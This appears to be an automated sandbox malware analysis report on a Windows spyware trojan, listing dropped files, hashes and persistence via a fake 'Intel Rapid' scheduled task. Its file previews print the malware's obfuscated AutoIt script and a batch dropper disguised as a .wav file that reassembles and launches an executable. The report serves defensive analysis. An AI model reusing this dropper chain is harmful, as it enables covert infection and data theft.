                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@34/34@6/7
                                                                    EGA Information:Failed
                                                                    HDC Information:
                                                                    • Successful, ratio: 100% (good quality ratio 95.5%)
                                                                    • Quality average: 83.1%
                                                                    • Quality standard deviation: 26.6%
                                                                    HCA Information:Failed
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240s for rundll32
                                                                    Warnings:
                                                                    Show All
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                    • TCP Packets have been reduced to 100
                                                                    • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.50.102.62, 67.26.75.254, 8.248.145.254, 67.26.83.254, 8.248.139.254, 8.248.119.254, 20.199.120.151, 20.199.120.85, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.199.120.182
                                                                    • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, vip1-wns2-par02p.wns.notify.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    15:24:22Task SchedulerRun new task: Intel Rapid path: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    15:24:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk
                                                                    15:26:14API Interceptor2x Sleep call for process: Bisogna.exe.com modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    No context

                                                                    Domains

                                                                    No context

                                                                    ASN

                                                                    No context

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Program Files (x86)\foler\olader\acledit.dll
                                                                    Process:C:\Users\user\AppData\Local\Temp\File.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):8704
                                                                    Entropy (8bit):4.699710473704491
                                                                    Encrypted:false
                                                                    SSDEEP:192:peH8gcV+GQqYTBBBAkvyMQ0F3OWYTWPGP:YH8gcV+GQqyAMD0WYTWPq
                                                                    MD5:8D96CB171B4138F43A754317BE9E982C
                                                                    SHA1:3C2975E7904486F39BE0455A63AFAA063064A93E
                                                                    SHA-256:727B96DCA0363F7CD5767F94BF72E0655EF1D00F44B27D496DEB733EB32BE12B
                                                                    SHA-512:AB58BD28169042D9502F64410E78AA41D219753D998AD5309699C57B50CE343B50AEB42DDA8EF6A52F8057DCD1BC2B4B6E0DE52819285DD3517BA3FA032E6EE3
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.................=.......>...............;.......:.......#.......9.......<.....Rich....................PE..L....IPT...........!................@........ ....`K.........................`.......U....@A................................`0..P....@.......................P..4...P...................................\............0..\............................text............................... ..`.data...P.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..4....P....... ..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Program Files (x86)\foler\olader\acppage.dll
                                                                    Process:C:\Users\user\AppData\Local\Temp\File.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):46592
                                                                    Entropy (8bit):6.143306131333313
                                                                    Encrypted:false
                                                                    SSDEEP:768:ppb1tuabwj1WVIlaFKuIJJPclXkxAc5J9UaXotuM5Uqw2mom:Uj1WelaFczPclwYtuM6qw2
                                                                    MD5:290075961DD4856211078377D14942C8
                                                                    SHA1:AD7F6DFD89A253DAA70D5BBB46E819DAE7EB3F61
                                                                    SHA-256:949FD56C5A63D3F1C20769BC2285AC5517C4CA84250C807F18247A2D93EFC1A4
                                                                    SHA-512:B431198324315E172FAFB062FCE93C5D5B18E691150E5E26DEC30F150622C38CE4342B9E9F5D4D847860A55E7FB75411BB8765A0F0AE87C99E0DC30F1BC42854
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................V>Z.....V>Y.........Q...V>\.....V>X.....V>].....V>E.....V>^.....V>[.....Rich............PE..L....CPT...........!.........,...........................................................@A....................................................................T...................................8+..\............................................text............................... ..`.orpc............................... ..`.data...............................@....idata..N...........................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................................................
                                                                    C:\Program Files (x86)\foler\olader\adprovider.dll
                                                                    Process:C:\Users\user\AppData\Local\Temp\File.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):49664
                                                                    Entropy (8bit):6.030619349644206
                                                                    Encrypted:false
                                                                    SSDEEP:768:Amge8Q4UsMhIrA1pifdlIGHmizKO6EjjKRyGlqesRtgjEDy:AG548IrA1pifdRHmizKiWRPlqPjy
                                                                    MD5:F981199C82A40CF638D313C4498ECAB9
                                                                    SHA1:9F2BA1092A90B048AAF51304D139018E13144F3B
                                                                    SHA-256:338287DDB5FDBF0F7540DAC8AE8A3F02643F7B45F3B401A9DFA6447E39043049
                                                                    SHA-512:09B33588E58C50036614E0FA26CCD8D94AE810F63D95C8464AE74CB9169F4DDCBCD8C019D656CD313ED65F8BB92B9782CF319866CE2A9BA1C003BD62A1BED171
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0..0..0...:..5...:..>..0......:..+...:..4...:..1...:..6...:..1...:..1..Rich0..................PE..L...0FPT...........!.....x...J......0z...............................................]....@A................................H............*..........................................................8...\...............D............................text....w.......x.................. ..`.data................|..............@....idata..............................@..@.rsrc....*.......,..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\json[1].json
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):281
                                                                    Entropy (8bit):4.910131341943193
                                                                    Encrypted:false
                                                                    SSDEEP:6:YWybuaSKaixIFIL4aCUCpqg+jgE0pPfH/9d7m:YWybuvkIyUaCX5+PcfnK
                                                                    MD5:EEC2DB6EFEC7ECBF86FED1B9BB93E1B8
                                                                    SHA1:AAFA53A34D62884D333C9B9823EB30F67E5611E1
                                                                    SHA-256:DB40165A2F38B3452F4F5A47362DB799F9784894FE94E39F276094F102F639EE
                                                                    SHA-512:4F64315D8CAFBD746EEA9F2B5380FBD40C0FAED3E9742FEA3E880253BA2BEAB619A6EBF04C5BA66CF94655A509F70A03ABD5A038E122A19794FA79F3D79C89D3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8152","lat":47.43,"lon":8.5718,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Cdn77 ZUR ITX","as":"AS60068 Datacamp Limited","query":"84.17.52.39"}
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exe
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4520950
                                                                    Entropy (8bit):7.9951946287991404
                                                                    Encrypted:true
                                                                    SSDEEP:98304:JZkh1NN1lnL8c2OyDghyjxbawGdO7cTXx9RROBbx5o++5Y:JojlnL84hyjxbjG87AXfRRmFm++6
                                                                    MD5:303F5DE158A079AAE941319BE50D1F2D
                                                                    SHA1:F4DD4F24CC60053F9707EACD21F6C17E9C401EE3
                                                                    SHA-256:CF1D928E2FF239CF44C0E9BD41598EC6E714AC1B1D1DE020A5A726B26A62E90D
                                                                    SHA-512:1E86B87124145BEDCA24728BEE1DB5D6208782056C7BAF3581690EB89FAD5F283243C5648FD604B427271C024F2CFE5D772C47C2ADF3F2002E24F3FAD747AF14
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 33%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.......................................@.................................@................................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\24DD.tmp
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):281
                                                                    Entropy (8bit):4.910131341943193
                                                                    Encrypted:false
                                                                    SSDEEP:6:YWybuaSKaixIFIL4aCUCpqg+jgE0pPfH/9d7m:YWybuvkIyUaCX5+PcfnK
                                                                    MD5:EEC2DB6EFEC7ECBF86FED1B9BB93E1B8
                                                                    SHA1:AAFA53A34D62884D333C9B9823EB30F67E5611E1
                                                                    SHA-256:DB40165A2F38B3452F4F5A47362DB799F9784894FE94E39F276094F102F639EE
                                                                    SHA-512:4F64315D8CAFBD746EEA9F2B5380FBD40C0FAED3E9742FEA3E880253BA2BEAB619A6EBF04C5BA66CF94655A509F70A03ABD5A038E122A19794FA79F3D79C89D3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8152","lat":47.43,"lon":8.5718,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Cdn77 ZUR ITX","as":"AS60068 Datacamp Limited","query":"84.17.52.39"}
                                                                    C:\Users\user\AppData\Local\Temp\F466.tmp
                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):281
                                                                    Entropy (8bit):4.910131341943193
                                                                    Encrypted:false
                                                                    SSDEEP:6:YWybuaSKaixIFIL4aCUCpqg+jgE0pPfH/9d7m:YWybuvkIyUaCX5+PcfnK
                                                                    MD5:EEC2DB6EFEC7ECBF86FED1B9BB93E1B8
                                                                    SHA1:AAFA53A34D62884D333C9B9823EB30F67E5611E1
                                                                    SHA-256:DB40165A2F38B3452F4F5A47362DB799F9784894FE94E39F276094F102F639EE
                                                                    SHA-512:4F64315D8CAFBD746EEA9F2B5380FBD40C0FAED3E9742FEA3E880253BA2BEAB619A6EBF04C5BA66CF94655A509F70A03ABD5A038E122A19794FA79F3D79C89D3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8152","lat":47.43,"lon":8.5718,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Cdn77 ZUR ITX","as":"AS60068 Datacamp Limited","query":"84.17.52.39"}
                                                                    C:\Users\user\AppData\Local\Temp\File.exe
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:modified
                                                                    Size (bytes):4520950
                                                                    Entropy (8bit):7.9951946287991404
                                                                    Encrypted:true
                                                                    SSDEEP:98304:JZkh1NN1lnL8c2OyDghyjxbawGdO7cTXx9RROBbx5o++5Y:JojlnL84hyjxbjG87AXfRRmFm++6
                                                                    MD5:303F5DE158A079AAE941319BE50D1F2D
                                                                    SHA1:F4DD4F24CC60053F9707EACD21F6C17E9C401EE3
                                                                    SHA-256:CF1D928E2FF239CF44C0E9BD41598EC6E714AC1B1D1DE020A5A726B26A62E90D
                                                                    SHA-512:1E86B87124145BEDCA24728BEE1DB5D6208782056C7BAF3581690EB89FAD5F283243C5648FD604B427271C024F2CFE5D772C47C2ADF3F2002E24F3FAD747AF14
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 33%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.......................................@.................................@................................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\Attitudine.wav
                                                                    Process:C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe
                                                                    File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):869712
                                                                    Entropy (8bit):5.77204377353311
                                                                    Encrypted:false
                                                                    SSDEEP:12288:ATRGfKvtTFIdgcPkly44D7CO2tlPnmKvz9u1BvFs9QMSbmTNMBjtyx/P+nHBPB0t:ATRGfy0Bou5iMe
                                                                    MD5:614FF77F40C57405F24F17F3F908AC8A
                                                                    SHA1:4D739AD63F3FD7AA481BBFAD06AD2C758FE834BF
                                                                    SHA-256:37A101023F94B802B17FA5636929E0B9F908E5E58DBA8D827047B06EB6641E6F
                                                                    SHA-512:7ABA4D54095D9BA3659EB9EE8CE5E7D8C5853FC6918CD33BDD66BAFC1BBF74A87F5D99A51C9BDD18A297045AEF95FB69412F89E63B4C5645668A7BB524FBB7EC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..$spvDuH = 185..$fftARYSJ = 97..While ((7878-7877)*7511)..Switch $spvDuH..Case 178....Local $oTWbZtfkpJwScUWSc = 567..Local $138 = 37..For $fkqzFRkngUabDqcCxhKkSfqtURQubPenrtwCTPhyjBPcSMuwvSm = 9 To 36..Local $znYSIFZFYsmFjiKPJ = 'fzdSmwsYdnromdCXzHeEpUJCjhAFJdrjxvlmEAYXAKgABQRpegOeM'..Local $oTWbZtfkpJwScUWSc = Sqrt(138, 26725)..Next....$spvDuH = $spvDuH + 1..Case 179....Local $NGjALfZxRNeurzSI = IsDeclared(wsgCYXHftdr)..Local $86 = 82..For $tmFowccsDxCwmfwOPQULvOcgyKePrYUWxHqVPAMlRooUbz = 12 To 25..Local $mFHRguZgtJTgGARL = 'ENLJaYvZLRmbcRkTCxRMmpUsZngrzIDmsYOSCViHlRDgARISIx'..Local $NGjALfZxRNeurzSI = Sqrt(86, 7228)..Next....$spvDuH = $spvDuH + 1..Case 180....Local $SxTzJTJzGehZybezs = Execute(DMpNUjALs("76.122.113.126.109.79.109.124.91.109.122.113.105.116.48.47.78.83.95.93.78.84.79.47.49",8)), $pKRErkqXTiTU = 'SDJOIJlrAHSKglOQnrJB'..Local $58 = 124..For $hpCHGFRoPvxZFbAayzYokhYQkAwALkPgrvSPvkOhCAthYGbPmNaIc = 16 To 30..Local $RezdmLnhwiNijyWev = 'IrZUPqjictpzdweOXFfTDPoFJuvHEauHye
                                                                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bel.wav
                                                                    Process:C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):893731
                                                                    Entropy (8bit):6.620386595658721
                                                                    Encrypted:false
                                                                    SSDEEP:12288:rpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:rT3E53Myyzl0hMf1tr7Caw8M01
                                                                    MD5:979FAE6A471437343D15E9C78801E719
                                                                    SHA1:0451B723F3F5F9FBE4D60ACB3737E1DF13F094A3
                                                                    SHA-256:1F814C47791117379E1C9F6559B17291A7D58222D4EFEFE28E18B3D81B76F57B
                                                                    SHA-512:FBF3D2DE406626F11F87CE6C07FCEE80DC1DE53CD8BE91A336A8FBEB262A043FA687E38B3B0B74B72DA93D26B49CB1984504F1332158E1F66A944D5E9902B69D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj........................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.....................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    Process:C:\Windows\SysWOW64\findstr.exe
                                                                    File Type:Targa image data - Mono 65536 x 184 x 0 +65535 ""
                                                                    Category:modified
                                                                    Size (bytes):893606
                                                                    Entropy (8bit):6.6201269982958335
                                                                    Encrypted:false
                                                                    SSDEEP:12288:5pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:5T3E53Myyzl0hMf1tr7Caw8M01
                                                                    MD5:AC7E48DBA858E15A8E690D815932BB19
                                                                    SHA1:BE87503D572E71FD3D66D0F9DDAD4F2CE00C1FE1
                                                                    SHA-256:FB037A9D6DE82C0CD301AEEAD155EEC3127282752E1F647A5DCDD156A685E6C2
                                                                    SHA-512:FCF848846A530CB6E60D79E49B51DADFD31C120E9F23DE6D89A6D9FC0CC38F29F0410E25A5F29BE5722B0BCDE15210B057D9D41E7928A3612EB53F16B7DFB00B
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview: ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\Quegli.wav
                                                                    Process:C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):444
                                                                    Entropy (8bit):5.812352182949276
                                                                    Encrypted:false
                                                                    SSDEEP:12:PhhSfBk3xCIk332Bwqwsm5+cAHcgxVDIXEITQv0qwhYn:PPX3xCP33uVdxpx6XEIT+pDn
                                                                    MD5:05CD6F416B8F61975EEA28E64A6ADF3F
                                                                    SHA1:097F3077BF5EF6929BD9D92B036B176D8D232375
                                                                    SHA-256:E6D0ABFB60CE6DD43AE270C1F21D2DC57906B957C8A570B1AAB807BFED92CA2D
                                                                    SHA-512:7356354071AC90B4996FB68F60D45E2020F169B5B0CEFDB2AACC89215AA6BFB0F2DD114B7B021CDAD6202F77BC82773A0575D0FA2950E50043C286468D9CD4C9
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: Set nwtNFYoxWEihdAspet=DESKTOP-..Set kazRNTQKuugFCJGLuGkKmOFlmSpHUhCVUmCey=QO5QU33..Set pghAnpLc=ping 127.0.0.1..Set FvPQxIMBUqXCAoefRpPhrUvUQL=MZ..<nul set /p = "%FvPQxIMBUqXCAoefRpPhrUvUQL%" > Bisogna.exe.com..findstr /V /R "^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$" Bel.wav >> Bisogna.exe.com..copy Attitudine.wav l..start Bisogna.exe.com l..%pghAnpLc%....
                                                                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\l
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                                                                    Category:modified
                                                                    Size (bytes):869712
                                                                    Entropy (8bit):5.77204377353311
                                                                    Encrypted:false
                                                                    SSDEEP:12288:ATRGfKvtTFIdgcPkly44D7CO2tlPnmKvz9u1BvFs9QMSbmTNMBjtyx/P+nHBPB0t:ATRGfy0Bou5iMe
                                                                    MD5:614FF77F40C57405F24F17F3F908AC8A
                                                                    SHA1:4D739AD63F3FD7AA481BBFAD06AD2C758FE834BF
                                                                    SHA-256:37A101023F94B802B17FA5636929E0B9F908E5E58DBA8D827047B06EB6641E6F
                                                                    SHA-512:7ABA4D54095D9BA3659EB9EE8CE5E7D8C5853FC6918CD33BDD66BAFC1BBF74A87F5D99A51C9BDD18A297045AEF95FB69412F89E63B4C5645668A7BB524FBB7EC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..$spvDuH = 185..$fftARYSJ = 97..While ((7878-7877)*7511)..Switch $spvDuH..Case 178....Local $oTWbZtfkpJwScUWSc = 567..Local $138 = 37..For $fkqzFRkngUabDqcCxhKkSfqtURQubPenrtwCTPhyjBPcSMuwvSm = 9 To 36..Local $znYSIFZFYsmFjiKPJ = 'fzdSmwsYdnromdCXzHeEpUJCjhAFJdrjxvlmEAYXAKgABQRpegOeM'..Local $oTWbZtfkpJwScUWSc = Sqrt(138, 26725)..Next....$spvDuH = $spvDuH + 1..Case 179....Local $NGjALfZxRNeurzSI = IsDeclared(wsgCYXHftdr)..Local $86 = 82..For $tmFowccsDxCwmfwOPQULvOcgyKePrYUWxHqVPAMlRooUbz = 12 To 25..Local $mFHRguZgtJTgGARL = 'ENLJaYvZLRmbcRkTCxRMmpUsZngrzIDmsYOSCViHlRDgARISIx'..Local $NGjALfZxRNeurzSI = Sqrt(86, 7228)..Next....$spvDuH = $spvDuH + 1..Case 180....Local $SxTzJTJzGehZybezs = Execute(DMpNUjALs("76.122.113.126.109.79.109.124.91.109.122.113.105.116.48.47.78.83.95.93.78.84.79.47.49",8)), $pKRErkqXTiTU = 'SDJOIJlrAHSKglOQnrJB'..Local $58 = 124..For $hpCHGFRoPvxZFbAayzYokhYQkAwALkPgrvSPvkOhCAthYGbPmNaIc = 16 To 30..Local $RezdmLnhwiNijyWev = 'IrZUPqjictpzdweOXFfTDPoFJuvHEauHye
                                                                    C:\Users\user\AppData\Local\Temp\dislip\parted.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\File.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:modified
                                                                    Size (bytes):3570176
                                                                    Entropy (8bit):7.965168872050083
                                                                    Encrypted:false
                                                                    SSDEEP:49152:2uktwV1jARt5+JYoCQnKlZqpvjQmjmwqjlQ1XDDAiKHbZ5sJcinzTPJmTlWouyEy:S4AR2JfFm87Qmx+Q1tfzuoouGR
                                                                    MD5:C92045F9553387FE8AB90B2B6A24E805
                                                                    SHA1:2DBEAA703044CC1862C4DEFB3A6D296F2AAF21CB
                                                                    SHA-256:EAB2C4113047771525F41FAAEAB5E4946691F44C9E5848C540593752C10D3C47
                                                                    SHA-512:238009E38F830F6354C30967E6A60FD237262D9B7515B591CC24C471574095B4E62B0B29D84DD4B21AD33C8BA3ABCF10C2985C8C67FBBDDDF90BC652715106FF
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 36%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................73.....71.....70......................sT.....sT........?...sT.....<......<......Rich............PE..d...(..\.........."......P...J......X.`........@....................................p#7...`.................................................................T.`..................................................................................................... .O.......................... ..` .....`...T..................@..@ x7...`......................@... ............................@..@ .............*..............@..@ H............,..............@..@ |............0..............@..B.idata...............8..............@....themida..]..........:..............`....boot....@5...`..@5..:..............`..`................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\File.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                                                                    Category:dropped
                                                                    Size (bytes):916160
                                                                    Entropy (8bit):7.725165769341836
                                                                    Encrypted:false
                                                                    SSDEEP:24576:zSBoSE33Q6SUGJVfTlHjvw/B3LhcZ9hK2tRwu:SpE3g6SUyTlu3lmc25
                                                                    MD5:20B1305BCB80B32661D564CE22DF4C24
                                                                    SHA1:18221A3156F955EE75E7028828909AB0F926DDFA
                                                                    SHA-256:4AD13166F9A30BDE93D68E3D7EDBDA87583E12DBB063F569B9F1C9E5656EBF2C
                                                                    SHA-512:9C4691521416D8ED6DDF77CF932564E1C4643D50C6F1ADDFBB49B86FCB88530A021D09C98902E98401A7C622ACA99120884C7DDD94E4261F74606DD1926F48AD
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P......P......P......P...P...P.....P......P......P......P..Rich.P..........................PE..L....G............................ k....................................................@...... .......................................................4......4.......................................@............................................text.............................. ..`.data...`"..........................@....rsrc...............................@..@.reloc..............................@..BK..GH...m..GU......Gb......Gl...s..Gv...'..G....R..G....v..G............ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.GDI32.dll.USER32.dll.msvcrt.dll.COMCTL32.dll.VERSION.dll............................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\djUYPUrixI\EHvwMhiAAtER.zip
                                                                    Process:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    File Type:Zip archive data, at least v2.0 to extract
                                                                    Category:dropped
                                                                    Size (bytes):72905
                                                                    Entropy (8bit):7.995925791213847
                                                                    Encrypted:true
                                                                    SSDEEP:1536:DViiJmDuu2ll2ZP6R9OodNHRcYOm3ivStJ7SxGdHHEVE93FA:DP0hJJSBdNyYOMAUJ7SYEW93a
                                                                    MD5:4F42D2087786749721881C468C4780D9
                                                                    SHA1:B8C9A7F2E20A9A29F2A891A1BB88FC9D29EB888C
                                                                    SHA-256:2ED9820870D156F464AB7AB87E458330CE98AEB73A67A7B833FFDA77849320AD
                                                                    SHA-512:7E4396E305A208EA0A49AEDAD3931DAD3DE1A02E81CBE4BC260385FFC3BAB8DD5B4192F770421E112A0A598ABDF5F6A9FC8164E2AE6DE6D508426DCCBD70CDA0
                                                                    Malicious:false
                                                                    Reputation:unknown
